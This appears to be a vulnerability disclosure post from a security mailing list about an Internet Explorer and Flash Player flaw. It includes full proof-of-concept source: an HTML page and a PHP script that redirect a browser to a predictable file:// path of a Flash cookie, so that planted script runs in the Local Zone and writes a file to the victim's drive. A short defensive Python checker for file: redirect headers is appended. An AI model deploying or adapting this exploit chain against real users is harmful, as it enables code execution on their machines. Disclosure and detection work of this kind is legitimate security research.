
Internet Explorer Vulnerability: Content-Location works with both triple and double slash



After I reported the Content-Location vulnerability
(http://www.securityfocus.com/archive/1/342317), Thor Larholm explained that
the HTML execution was not caused by the Content-Location header, but instead
by the triple slash (file:///). I have tested it with double slash and I even
tested the triple slash without the Content-Location header, but neither worked.
The difference between triple slash and double slash is that in triple, htm.html
loads the cookie in the iframe, and with double slash it causes the whole page
to try and load the cookie, which would then require the user to press Back and
then refresh the page.

I have created 2 proof-of-concepts which show how both vulnerabilities cannot
be exploited separately.

1. http://mlsecurity.com/ie/wee.php

This page will create a flash cookie and when you press continue it will load 
htm.html which contains an iframe. 
This iframe will load red.php which contains the Content-Location header 
pointing at the flash cookie. 
The flash cookie location will only have a double slash (file://).

wee.php  - Loads a flash movie which creates a cookie in
C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol


htm.html
******************************
<html>
<script type="text/javascript" src="querystring.js"></script>
<script>

document.write(unescape("%3Ciframe%20name%3D%22wee2%22%20src%3D%22red.php%3Fa%3D"
 + QueryString['a'] + "%26drive%3D" + QueryString['drive'] + 
"%22%3E%3C/iframe%3E"));

</script>
<br><p>
Sometimes the iframe doesn't load properly. If the iframe shows a white blank 
page then press refresh.
<p>
You will know when the exploit worked when the iframe shows weird stuff like 
my_Array0Sven1kelor2.
<p>

The script assumes you are under windows 2000/XP logged on as administrator.<br>


If you are not logged on as administrator type the username you're logged in 
under in the box below and press Go Go Go.<p>

<form method="GET">
Logged on to windows as user: <input type=text name="a" 
value="administrator"><br>
Windows is installed on drive: <input type=text name="drive" value="C"><br>
<input type=submit value="Go Go Go">
</form>

<p>

This should create a file called mlsecurity.txt in your c:\ drive.

<p>

<a href="exp.php">How it works?</a>

</html>
******************************

red.php
******************************
<?php
// Username from the query string; htm.html passes "undefined" when the
// field is missing, so treat that like an empty value.
$a = $_GET["a"];
if(!$a || $a=="undefined")
{
        $a="administrator";
}
// Drive letter from the query string, same "undefined" handling.
if($_GET["drive"] && !strstr($_GET["drive"],"unde"))
{
        $d=$_GET["drive"];
}else
{
        $d="C";
}
// Double-slash file:// redirect to the predictable Flash cookie path.
header("Location: file://".$d.":/Documents and Settings/".$a."/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol");
?>

******************************





2. http://mlsecurity.com/ie/ie.php

This proof-of-concept only uses the triple slash method to open the cookie in 
an iframe.

ie.php - Loads a flash movie which creates a cookie in
C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol

htm2.html
******************************
<html>


        <iframe src="file:///C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol"></iframe>

 <p>
Note: you might need to edit the html to fit your system.  
<p>

Macromedia Flash Player is reported to store Flash cookies (.sol files) in a 
predictable location on client systems.  
Other attacks are possible given the ability to store content on a system in a 
predictable location, such as 
referencing the content via a file:// URI.  This is compounded by the fact that 
an attacker could include HTML 
and script code in the cookie, which may be interpreted by Internet Explorer or 
possibly other browsers.  
In the example of Internet Explorer, such content would be interpreted in the 
context of the Local Zone.  
Successful exploitation would still require the attacker to guess the local 
username of the victim.
<br>
<br>This issue is reported to affect versions of the player for Microsoft 
Windows operating systems.  
Other versions may also be affected.  Macromedia Director MX is similarly 
affected.
<br>
<br>This issue was originally covered by Securityfocus.com BID 8886 but has 
been determined to be a distinct 
issue in Macromedia Flash. Securityfocus.com BID 8886 was also updated with 
additional technical details 
describing a new issue in Internet Explorer.  The original report for these 
issues was a proof-of-concept
 provided by Mindwarper which exploited both of the issues simultaneously.
<p>


- Discovered by Mindwarper<br>
</html>

******************************


I have tested these pages on both win2k sp4 ie6 fully patched and on winXP. 
I even tried using a few IE hacks and it still worked.

-----------------------------|
- Mindwarper                 |
- mindwarper@xxxxxxxxxxxxx   |
- http://mlsecurity.com      |
-----------------------------|
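A defender-side check for the header pattern this post describes, added here as an example and not part of Mindwarper's original proof-of-concept: it parses raw HTTP response headers and flags any Location or Content-Location value that points into a file: URI, reporting whether the double-slash (file://) or triple-slash (file:///) form was used. The sample responses below are constructed for the example, not captured from mlsecurity.com; a response-inspecting proxy or web-application test could apply the same check.

```python
import re

# Headers that can steer a browser to another resource. The post's red.php
# uses "Location"; the original report used "Content-Location".
REDIRECT_HEADERS = ("location", "content-location")

# Constructed sample responses for this example (not captured traffic).
SAMPLE_RESPONSES = {
    "red_double": (
        "HTTP/1.1 302 Found\r\n"
        "Location: file://C:/Documents and Settings/administrator/"
        "Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol\r\n"
        "Content-Type: text/html\r\n\r\n"
    ),
    "content_loc_triple": (
        "HTTP/1.1 200 OK\r\n"
        "Content-Location: file:///C:/Documents and Settings/administrator/"
        "Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol\r\n"
        "Content-Type: text/html\r\n\r\n"
    ),
    "benign": (
        "HTTP/1.1 302 Found\r\n"
        "Location: https://example.org/next\r\n\r\n"
    ),
}

# Matches a file: scheme and captures the run of slashes after it.
FILE_URI = re.compile(r"^file:(/+)", re.IGNORECASE)


def parse_headers(raw):
    """Split a raw HTTP response into (lower-cased name, value) pairs."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return headers


def find_local_redirects(raw):
    """Return (header, slash_count, value) for every redirect-style header
    whose value is a file: URI. slash_count is 2 for file:// and 3 for
    file:///, the two forms the post compares; an empty list means clean."""
    findings = []
    for name, value in parse_headers(raw):
        if name in REDIRECT_HEADERS:
            m = FILE_URI.match(value)
            if m:
                findings.append((name, len(m.group(1)), value))
    return findings
```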
